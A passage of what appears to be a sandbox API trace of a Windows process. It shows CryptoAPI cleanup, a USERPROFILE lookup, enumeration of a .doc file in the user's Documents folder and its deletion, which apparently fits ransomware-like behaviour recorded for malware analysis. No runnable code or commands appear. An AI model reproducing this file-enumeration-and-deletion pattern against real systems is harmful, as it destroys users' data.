lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.332] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.332] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0259.332] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.332] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0259.333] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0259.333] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0259.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0259.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.333] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0259.333] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0259.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0259.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.333] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0259.334] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.334] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.334] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0259.334] FreeLibrary (hLibModule=0x756e0000) returned 1 [0259.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.334] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0259.334] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0259.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.335] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0259.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0259.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0259.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0259.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0259.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516e8 [0259.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0259.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0259.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0259.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0259.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0259.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0259.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0259.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0259.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0259.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.335] CloseHandle (hObject=0x2a0) returned 1 [0259.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0259.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0259.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0259.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0259.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0259.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0259.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0259.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0259.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0259.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0259.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0259.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0259.340] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0259.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0259.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0259.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0259.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0259.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0259.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0259.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0259.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51700 [0259.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0259.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0259.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51718 [0259.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0259.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0259.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.341] CloseHandle (hObject=0x2d0) returned 1 [0259.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0259.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0259.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0259.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0259.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0259.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0259.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0259.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0259.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0259.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0259.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0259.348] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0259.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0259.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0259.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0259.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0259.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0259.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0259.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0259.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0259.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0259.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0259.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0259.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0259.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0259.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0259.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0259.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0259.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0259.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0259.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0259.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0259.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0259.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0259.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0259.354] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0259.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0259.354] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0259.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0259.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0259.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0259.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0259.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0259.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0259.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0259.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0259.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0259.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0259.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0259.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x66) returned 0x2e558d8 [0259.355] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/1jNOs4dsiatFwtPt-_j2.doc", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\1jNOs4dsiatFwtPt-_j2.doc", lpFilePart=0x8cedf4*="1jNOs4dsiatFwtPt-_j2.doc") returned 0x32 [0259.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0259.355] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\1jNOs4dsiatFwtPt-_j2.doc" (normalized: "c:\\users\\fd1hvy\\documents\\1jnos4dsiatfwtpt-_j2.doc")) returned 0x20 [0259.355] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\1jNOs4dsiatFwtPt-_j2.doc", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0650cc0, ftCreationTime.dwHighDateTime=0x1d5ee54, ftLastAccessTime.dwLowDateTime=0x4e3029d0, ftLastAccessTime.dwHighDateTime=0x1d5ef02, ftLastWriteTime.dwLowDateTime=0x4e3029d0, ftLastWriteTime.dwHighDateTime=0x1d5ef02, nFileSizeHigh=0x0, nFileSizeLow=0xda0a, dwReserved0=0x1, dwReserved1=0x1c, cFileName="1jNOs4dsiatFwtPt-_j2.doc", cAlternateFileName="1JNOS4~1.DOC")) returned 0xa87250 [0259.355] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\1jNOs4dsiatFwtPt-_j2.doc" (normalized: "c:\\users\\fd1hvy\\documents\\1jnos4dsiatfwtpt-_j2.doc")) returned 1 [0259.357] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0650cc0, ftCreationTime.dwHighDateTime=0x1d5ee54, ftLastAccessTime.dwLowDateTime=0x4e3029d0, ftLastAccessTime.dwHighDateTime=0x1d5ef02, 